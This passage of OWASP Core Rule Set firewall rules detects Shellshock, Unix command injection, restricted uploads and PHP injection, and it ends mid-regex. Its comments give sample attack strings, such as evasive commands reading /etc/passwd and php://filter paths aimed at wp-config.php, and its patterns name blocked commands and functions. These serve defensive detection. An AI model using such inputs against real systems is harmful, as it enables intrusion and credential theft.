    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/248/88',\
    tag:'PCI/6.5.2',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# [ Shellshock vulnerability (CVE-2014-6271 and CVE-2014-7169) ]
#
# Detect exploitation of "Shellshock" GNU Bash RCE vulnerability.
#
# Based on ModSecurity rules created by Red Hat.
# Permission for use was granted by Martin Prpic
#
# https://access.redhat.com/articles/1212303
#
# Rules 932170 and 932171 share one pattern, "^\(\s*\)\s+{": an empty pair of
# parentheses, whitespace, then an opening brace, anchored at the start of
# the inspected value.
#  - 932170 inspects the request headers and the request line (t:urlDecode).
#  - 932171 inspects argument names, argument values and uploaded file names
#    (t:urlDecode followed by t:urlDecodeUni).
# Both add the critical anomaly score to tx.rce_score and
# tx.anomaly_score_pl1, and both use the same msg text, so tell them apart by
# rule id when triaging logs.
# NOTE(review): because of the "^" anchor a value only matches when it begins
# with the pattern; for REQUEST_LINE that means the line itself has to start
# with it. Confirm this is the intended coverage for that variable.
#
SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \
    "id:932170,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecode,\
    msg:'Remote Command Execution: Shellshock (CVE-2014-6271)',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-shell',\
    tag:'platform-unix',\
    tag:'attack-rce',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/248/88',\
    tag:'PCI/6.5.2',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \
    "id:932171,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecode,t:urlDecodeUni,\
    msg:'Remote Command Execution: Shellshock (CVE-2014-6271)',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-shell',\
    tag:'platform-unix',\
    tag:'attack-rce',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/248/88',\
    tag:'PCI/6.5.2',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# -=[ Restricted File Upload ]=-
#
# Detects attempts to upload a file with a forbidden filename.
#
# Many applications contain Unrestricted File Upload vulnerabilities.
# https://www.owasp.org/index.php/Unrestricted_File_Upload
#
# These might be abused to upload configuration files or other files
# that affect the behavior of the web server, possibly causing remote
# code execution.
#
# Rule 932180 is a phrase match (@pmFromFile) of the lowercased file name
# against restricted-upload.data. The name is taken from FILES and from the
# request headers X-Filename, X_Filename and X-File-Name.
# NOTE(review): this rule is tagged 'attack-rce' but adds its score to
# tx.lfi_score, whereas the neighbouring RCE rules in this file add to
# tx.rce_score. tx.anomaly_score_pl1 is still incremented, so only the
# per-category score is affected. Confirm which category is intended.
# NOTE(review): unlike the neighbouring rules, this one does not set
# ctl:auditLogParts=+E.
#
SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X-File-Name \
    "@pmFromFile restricted-upload.data" \
    "id:932180,\
    phase:2,\
    block,\
    capture,\
    t:none,t:lowercase,\
    msg:'Restricted File Upload Attempt',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-rce',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/248/88',\
    tag:'PCI/6.5.2',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"


# Paranoia level gate, one rule per phase: when the executing paranoia level
# is below 2, skip every rule up to the END-REQUEST-932 marker.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#

#
# -=[ Rule 932200 ]=-
#
# Block RCE Bypass using different techniques:
# - uninitialized variables (https://www.secjuice.com/web-application-firewall-waf-evasion/)
# - string concatenations (https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
# - globbing patterns (https://medium.com/secjuice/waf-evasion-techniques-718026d693d8)
#
# Examples:
# - foo;cat$u+/etc$u/passwd
# - bar;cd+/etc;/bin$u/ca*+passwd
# - foo;ca\t+/et\c/pa\s\swd
# - foo;c'at'+/etc/pa's'swd
#
# Regex notes: https://regex101.com/r/JgZFRi/7
#
# This is a three-rule chain. The scores are only added when the first
# pattern matches and the matched variable also contains a "/" and a
# whitespace character (the two chained MATCHED_VAR checks).
# NOTE(review): as with rule 932180, the chain is tagged 'attack-rce' but
# adds its score to tx.lfi_score rather than tx.rce_score. Confirm which
# category is intended.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ([*?`\\'][^/\n]+/|\$[({\[#a-zA-Z0-9]|/[^/]+?[*?`\\'])" \
    "id:932200,\
    phase:2,\
    block,\
    capture,\
    t:none,t:lowercase,t:urlDecodeUni,\
    msg:'RCE Bypass Technique',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-rce',\
    tag:'paranoia-level/2',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/248/88',\
    tag:'PCI/6.5.2',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    chain"
    SecRule MATCHED_VAR "@rx /" "t:none,t:urlDecodeUni,chain"
        SecRule MATCHED_VAR "@rx \s" "t:none,t:urlDecodeUni,\
            setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
            setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"


# Paranoia level gate, one rule per phase: when the executing paranoia level
# is below 3, skip every rule up to the END-REQUEST-932 marker.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#

# Missing Unix commands have been added to a new word list i.e.
# util/regexp-assemble/regexp-932106.txt
# These commands may have a higher risk of false positives.
# Therefore, they have been split off to a separate rule in PL3.
# For explanation of this rule, see rule 932100.
#
# To rebuild the word list regexp:
#   cd util/regexp-assemble
#   cat regexp-932106.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl
#
# Then insert the assembled regexp into this template:
#
# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*
# [regexp assembled from util/regexp-assemble/regexp-932106.txt]
# \b" \
#
# This rule is a stricter sibling of rule 932100.
# Rule 932106 (paranoia level 3) runs with t:none, so the pattern is applied
# to the value without further transformation. The pattern expects a shell
# separator or substitution prefix (for example ";", "|", "&", a newline,
# "$(" or a backtick), an optional path prefix, and then one of these command
# names: aptitude, up2date, dnf, vi, pacman, pwd, ps, w, who. Backslashes and
# quotes between the letters of a name are tolerated by the pattern.
# A match adds the critical anomaly score to tx.rce_score and
# tx.anomaly_score_pl3.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:(?:(?:a[\\\\'\"]*p[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*u[\\\\'\"]*d|u[\\\\'\"]*p[\\\\'\"]*2[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t)[\\\\'\"]*e|d[\\\\'\"]*n[\\\\'\"]*f|v[\\\\'\"]*i)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*(?:a[\\\\'\"]*c[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*(?:\s|<|>).*|w[\\\\'\"]*d|s)|w[\\\\'\"]*(?:(?:\s|<|>).*|h[\\\\'\"]*o))\b" \
    "id:932106,\
    phase:2,\
    block,\
    capture,\
    t:none,\
    msg:'Remote Command Execution: Unix Command Injection',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-shell',\
    tag:'platform-unix',\
    tag:'attack-rce',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/248/88',\
    tag:'PCI/6.5.2',\
    tag:'paranoia-level/3',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"

#
# -=[ Bypass Rule 930120 (wildcard) ]=-
#
# When Paranoia Level is set to 1 and 2, a Remote Command Execution
# could be exploited bypassing rule 930120 (OS File Access Attempt)
# by using wildcard characters.
#
# In some other cases, it could be bypassed even if the Paranoia Level is set to 3.
# Please, keep in mind that this rule could lead to many false positives.
#
# Rule 932190 (paranoia level 3) inspects ARGS only. After urlDecode,
# urlDecodeUni, normalizePath and cmdLine it looks for a "/" or "\" followed
# by a run of "?" / "*" wildcards adjacent to letters or path separators.
# A match adds the critical anomaly score to tx.rce_score and
# tx.anomaly_score_pl3.
#
SecRule ARGS "@rx (?:/|\\\\)(?:[\?\*]+[a-z/\\\\]+|[a-z/\\\\]+[\?\*]+)" \
    "id:932190,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecode,t:urlDecodeUni,t:normalizePath,t:cmdLine,\
    msg:'Remote Command Execution: Wildcard bypass technique attempt',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-shell',\
    tag:'platform-unix',\
    tag:'attack-rce',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/248/88',\
    tag:'PCI/6.5.2',\
    tag:'paranoia-level/3',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"


# Paranoia level gate, one rule per phase: when the executing paranoia level
# is below 4, skip every rule up to the END-REQUEST-932 marker.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#



#
# -= Paranoia Levels Finished =-
#
# Target of the skipAfter actions in the paranoia level gates of this file.
SecMarker "END-REQUEST-932-APPLICATION-ATTACK-RCE"
# NOTE(review): the next line is tar header residue from the archive listing,
# not a ModSecurity directive. It marks where the next archive member,
# rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf, begins.
modsecurity-crs-3.3.5/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf000066400000000000000000000776671446122515100235060ustar00rootroot00000000000000
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.5
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------

#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#


# Paranoia level gate, one rule per phase: when the executing paranoia level
# is below 1, skip every rule up to the END-REQUEST-933 marker.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#

#
# -=[ PHP Injection Attacks ]=-
#
# [ References ]
# http://rips-scanner.sourceforge.net/
# https://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Executionh
#

#
# [ PHP Open Tag Found ]
#
# Detects PHP open tags "<?" and "<?php".
#
# An XML declaration ("<?xml" followed by whitespace) is excluded by the
# first alternative of the pattern, to avoid false positives.
#
# Also detects the "[php]", "[/php]" and "[\php]" tags.
#
# Previously, this rule also checked for the PHP close tag '?>', but
# this resulted in false positives which were difficult to prevent.
# Therefore, that pattern is now checked by rule 933190 in paranoia levels
# 3 or higher.
#
# The value is URL-decoded (urlDecodeUni) and lowercased before matching.
# A match adds the critical anomaly score to tx.php_injection_score and
# tx.anomaly_score_pl1.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:<\?(?:[^x]|x[^m]|xm[^l]|xml[^\s]|xml$|$)|<\?php|\[(?:\/|\\\\)?php\])" \
    "id:933100,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:lowercase,\
    msg:'PHP Injection Attack: PHP Open Tag Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-php',\
    tag:'platform-multi',\
    tag:'attack-injection-php',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# [ PHP Script Uploads ]
#
# Block file uploads with filenames ending in PHP related extensions
# (.php, .phps, .phtml, .php5 etc).
#
# Many applications contain Unrestricted File Upload vulnerabilities.
# https://www.owasp.org/index.php/Unrestricted_File_Upload
#
# Attackers may use such a vulnerability to achieve remote code execution
# by uploading a .php file. If the upload storage location is predictable
# and not adequately protected, the attacker may then request the uploaded
# .php file and have the code within it executed on the server.
#
# Also block files with just dot (.) characters after the extension:
# https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla
#
# Some AJAX uploaders use the nonstandard request headers X-Filename,
# X_Filename, or X-File-Name to transmit the file name to the server;
# scan these request headers as well as multipart/form-data file names.
#
# NOTE(review): the rule also scans a fourth header, X.Filename, which the
# paragraph above does not list.
# NOTE(review): the pattern covers names ending in .php, .php followed by
# digits, or .phtml, each optionally followed by trailing dots. The section
# introduction also lists .phps, which this pattern does not cover; confirm
# whether that is intended.
#
SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\.*$" \
    "id:933110,\
    phase:2,\
    block,\
    capture,\
    t:none,t:lowercase,\
    msg:'PHP Injection Attack: PHP Script File Upload Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-php',\
    tag:'platform-multi',\
    tag:'attack-injection-php',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"


#
# [ PHP Configuration Directives ]
#
# Two-rule chain: a phrase from php-config-directives.data must be found, and
# the matched variables must also contain an "=" character. The scores and
# the audit log part are only set by the second (chained) rule, i.e. when
# both conditions hold.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-config-directives.data" \
    "id:933120,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:normalisePath,t:lowercase,\
    msg:'PHP Injection Attack: Configuration Directive Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-php',\
    tag:'platform-multi',\
    tag:'attack-injection-php',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    chain"
    SecRule MATCHED_VARS "@pm =" \
        "capture,\
        ctl:auditLogParts=+E,\
        setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
        setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"


#
# [ PHP Variables ]
#
# Phrase match against php-variables.data after normalisePath, urlDecodeUni
# and lowercase. A match adds the critical anomaly score to
# tx.php_injection_score and tx.anomaly_score_pl1.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-variables.data" \
    "id:933130,\
    phase:2,\
    block,\
    capture,\
    t:none,t:normalisePath,t:urlDecodeUni,t:lowercase,\
    msg:'PHP Injection Attack: Variables Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-php',\
    tag:'platform-multi',\
    tag:'attack-injection-php',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"


#
# [ PHP I/O Streams ]
#
# The "php://" syntax can be used to refer to various objects, such as local files (for LFI),
# remote urls (for RFI), or standard input/request body. Its occurrence indicates a possible attempt
# to either inject PHP code or exploit a file inclusion vulnerability in a PHP web app.
#
# Examples:
# php://filter/resource=./../../../wp-config.php
# php://filter/resource=http://www.example.com
# php://stdin
# php://input
#
# http://php.net/manual/en/wrappers.php.php
#
# Rule 933140 runs with t:none; case-insensitivity comes from the (?i) flag
# in the pattern rather than from a lowercase transformation. The pattern
# covers the stdin/stdout/stderr, input/output, fd, memory, temp and filter
# streams. A match adds the critical anomaly score to tx.php_injection_score
# and tx.anomaly_score_pl1.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)php://(?:std(?:in|out|err)|(?:in|out)put|fd|memory|temp|filter)" \
    "id:933140,\
    phase:2,\
    block,\
    capture,\
    t:none,\
    msg:'PHP Injection Attack: I/O Stream Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-php',\
    tag:'platform-multi',\
    tag:'attack-injection-php',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"


#
# [ PHP Wrappers ]
#
# PHP comes with many built-in wrappers for various URL-style protocols for use with the filesystem
# functions such as fopen(), copy(), file_exists() and filesize(). Abuse of PHP wrappers like phar://
# could lead to RCE as described by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even
# wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and expect:// to RCE.
#
# Rule 933200 matches the zlib, glob, phar, ssh2, rar, ogg, expect and zip
# schemes followed by "://", case-insensitively, after utf8toUnicode,
# urlDecodeUni, removeNulls and cmdLine.
# Unlike the neighbouring rules it has no 'capture' action, so its logdata
# reports the whole matched variable (%{MATCHED_VAR}) instead of %{TX.0}.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:zlib|glob|phar|ssh2|rar|ogg|expect|zip)://" \
    "id:933200,\
    phase:2,\
    block,\
    t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\
    msg:'PHP Injection Attack: Wrapper scheme detected',\
    logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
    tag:'application-multi',\
    tag:'language-php',\
    tag:'platform-multi',\
    tag:'attack-injection-php',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"


#
# [ PHP Functions ]
#
# Detecting PHP function names is useful to block PHP code injection attacks.
# There are many PHP functions. We have to strike a balance between robust detection
# of PHP code in content, and the risk of false positives.
#
# The list of PHP functions is divided into four groups of varying attack/false positive risk.
# Four separate rules are used to detect these groups of functions:
#
# - Rule 933150: ~40 words highly common to PHP injection payloads and extremely rare in
#   natural language or other contexts.
#   Examples: 'base64_decode', 'file_get_contents'.
#   These words are detected as a match directly using @pmFromFile.
#   Function names are defined in php-function-names-933150.data
#
# - Rule 933160: ~220 words which are common in PHP code, but have a higher chance to cause
#   false positives in natural language or other contexts.
#   Examples: 'chr', 'eval'.
#   To mitigate false positives, a regexp looks for PHP function syntax, e.g. 'eval()'.
#   Regexp is generated from function names in util/regexp-assemble/regexp-933160.data
#
# - Rule 933151: ~1300 words of lesser importance. This includes most PHP functions and keywords.
#   Examples: 'addslashes', 'array_diff'.
#   For performance reasons, the @pmFromFile operator is used, and many functions from lesser
#   used PHP extensions are removed.
#   To mitigate false positives, we only match when the '(' character is also found.
#   This rule only runs in paranoia level 2 or higher.
#   Function names are defined in php-function-names-933151.data
#
# - Rule 933161: ~200 words with short or trivial names, possibly leading to false positives.
#   Examples: 'abs', 'cos'.
#   To mitigate false positives, a regexp matches on function syntax, e.g. 'abs()'.
#   This rule only runs in paranoia level 3 or higher.
#   Regexp is generated from function names in util/regexp-assemble/regexp-933161.data
#


#
# [ PHP Functions: High-Risk PHP Function Names ]
#
# Rule 933150 contains a small list of function names which are highly indicative of a PHP
# injection attack, for example 'base64_decode'.
# We block these function names outright, without using a complex regexp or chain.
# This could make the detection a bit more robust against possible bypasses.
#
# In addition to cookies, arguments and XML content, this rule also inspects
# REQUEST_FILENAME. The value is lowercased before the phrase match.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933150.data" \
    "id:933150,\
    phase:2,\
    block,\
    capture,\
    t:none,t:lowercase,\
    msg:'PHP Injection Attack: High-Risk PHP Function Name Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-php',\
    tag:'platform-multi',\
    tag:'attack-injection-php',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"


#
# [ PHP Functions: High-Risk PHP Function Calls ]
#
# Some PHP function names have a certain risk of false positives, due to short
# names, full or partial overlap with common natural language terms, uses in
# other contexts, et cetera. Some examples are 'eval', 'exec', 'system'.
#
# For these function names, we apply a regexp to look for PHP function syntax.
# The regexp looks for a word boundary and adjoining parentheses.
# For instance, we want to block 'eval()', but we want to allow 'medieval()'.
#
# We have to be careful of possible bypasses using comment syntax. Examples:
#
#   system(...)
#   system (...)
#   system\t(...)
#   system /*comment*/ (...)
#   system /*multiline \n comment*/ (...)
#   system //comment \n (...)
#   system #comment \n (...)
#
# This rule is also triggered by the following exploit(s):
# [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ]
# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45260 ]
# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
#
# Regexp generated from util/regexp-assemble/regexp-933160.data using Regexp::Assemble.
# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage.
#
# Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble
# output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)"
#
# The pattern below is generated output; change the word list and re-assemble
# instead of editing it by hand. The rule runs with t:none and relies on the
# (?i) flag for case-insensitivity.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create|socket_client)|ipc?slashes|rev)|implexml_load_(?:string|file)|ocket_c(?:onnect|reate)|h(?:ow_sourc|a1_fil)e|pl_autoload_register|ystem)|p(?:r(?:eg_(?:replace(?:_callback(?:_array)?)?|match(?:_all)?|split)|oc_(?:(?:terminat|clos|nic)e|get_status|open)|int_r)|o(?:six_(?:get(?:(?:e[gu]|g)id|login|pwnam)|mk(?:fifo|nod)|ttyname|kill)|pen)|hp(?:_(?:strip_whitespac|unam)e|version|info)|g_(?:(?:execut|prepar)e|connect|query)|a(?:rse_(?:ini_file|str)|ssthru)|utenv)|r(?:unkit_(?:function_(?:re(?:defin|nam)e|copy|add)|method_(?:re(?:defin|nam)e|copy|add)|constant_(?:redefine|add))|e(?:(?:gister_(?:shutdown|tick)|name)_function|ad(?:(?:gz)?file|_exif_data|dir))|awurl(?:de|en)code)|i(?:mage(?:createfrom(?:(?:jpe|pn)g|x[bp]m|wbmp|gif)|(?:jpe|pn)g|g(?:d2?|if)|2?wbmp|xbm)|s_(?:(?:(?:execut|write?|read)ab|fi)le|dir)|ni_(?:get(?:_all)?|set)|terator_apply|ptcembed)|g(?:et(?:_(?:c(?:urrent_use|fg_va)r|meta_tags)|my(?:[gpu]id|inode)|(?:lastmo|cw)d|imagesize|env)|z(?:(?:(?:defla|wri)t|encod|fil)e|compress|open|read)|lob)|a(?:rray_(?:u(?:intersect(?:_u?assoc)?|diff(?:_u?assoc)?)|intersect_u(?:assoc|key)|diff_u(?:assoc|key)|filter|reduce|map)|ssert(?:_options)?)|h(?:tml(?:specialchars(?:_decode)?|_entity_decode|entities)|